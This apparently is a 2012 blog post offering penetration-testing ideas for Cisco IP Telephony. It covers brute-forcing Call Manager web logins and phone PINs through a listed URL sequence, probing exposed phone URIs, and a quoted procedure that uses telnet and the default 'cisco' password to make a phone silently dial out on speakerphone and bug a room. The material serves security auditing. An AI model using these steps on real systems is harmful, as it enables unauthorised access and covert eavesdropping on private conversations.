14 Oct 2012

Cisco IP Telephony security auditing ideas

Here's some ideas for security auditing a Cisco IP Telephony solution.

Password Auditing

Web UI

Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/showHome.do

IP phone PIN 

The programmatic approach to test for Phone PIN would use an approach as described here: http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

NB: I haven't done that test automatically to avoid problems (in Prod) but I think that the clean sequence required looks like this:
  • Get SIDVAL: /ccmpd/pdCheckLogin.do?name=undefined 
  • Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/login.do?sid=SIDVAL&userid=USERID&pin=PIN
  • Initiate logout: /ccmpd/pdLogoutPage.do?sid=SIDVAL
  • Confirm logout and close session: /ccmpd/logout.do?sid=SIDVAL

 

Test other URIs used by Cisco IP phone

  • http://.../ccmcip/xmldirectory.jsp 
  • http://.../ccmcip/getservicesmenu.jsp 
  • http://.../ccmcip/GetTelecasterHelpText.jsp 
  • http://.../ccmcip/authenticate.jsp

Check if IP Phones can be used to remotely bug a (conference) room 

Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described here http://dorkbyte.com/2010/10/31/cisco-ip-phones-lets-you-remotely-bug-a-room/

Excerpt from above reference (in case the above post disappears):
There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

To try this out:
  1. Telnet to the phone (e.g. “telnet 192.0.2.10″). You may need to bridge your PC to the IP Phone VLAN from within the office (see http://www.linuxjournal.com/article/10821?page=0,2, use VLAN as determined from an IP phone's settings - eg: VLAN 161, IP: 172.16.2.241/255.255.255.127, DHCP server: 172.16.29.10, Host Name: SEPD0C282439930)
  2. Enter the password for the phone At the “SIP Phone>” prompt: Start a “test” session with “test open”
  3. Virtually take the phone off the hook with “test offhook”
  4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666″) 
  5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
  6. Listen to the audio streaming from the phone… 

Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)